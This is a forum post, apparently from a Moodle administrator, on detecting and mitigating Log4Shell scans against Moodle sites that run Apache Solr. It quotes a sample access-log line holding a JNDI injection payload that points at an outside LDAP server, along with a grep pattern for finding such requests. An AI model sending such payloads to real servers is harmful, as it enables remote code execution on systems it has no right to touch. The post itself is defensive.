Been watching this on a Google Compute Engine instance, a RackSpace instance, and a internally hosted VMWare instance of moodle.
From what I read, Apache Solr is listed.
Your server running? From ssh prompt: ps aux |grep java
Can shut it down by issuing a kill -9 PID
*IF* ... *IF* you moodle site is running Apache Solr for Moodle site search, yes, could be vulnerable. Fix until fixes are released ... shut down solr ... which is a java applet ... and set your moodle up for the alternative search ... which doesn't use solr.
All my servers have been scanned for vulnerability:
fgrep ''jndi:ldap:' /var/log/httpd/ssl_access_log
or where ever your log files are kept/named.
Example of what you might see:
195.251.41.139 - - [13/Dec/2021:07:36:42 -0600] "GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" 404 238
To add to CentOS 7 drop zone:
firewall-cmd --zone=drop --add-source=195.251.41.139
That's temporary ... a reboot of server will clear that.
Before you do that ... if you do ... do a whois on that IP address. If that IP is ID'd as part of your providers blocks of IP's, inquire with provider. IF provider was being proactive then you might not want to block that IP. IF provider was not being proactive then you have a 'nosey neighbor' who should keep their nose out of your business ... block it!
On my instances, have seen scans from Digital Ocean blocks of IP's ... among others. I have no services on DO nor am I using any DO hosted server for anything frontend or backend. Thus, am considering those DO customers 'bad actors' and have blocked entire ranges of DO's IP's.
Not a 'security expert' ... just My 2 cents!
'SoS', Ken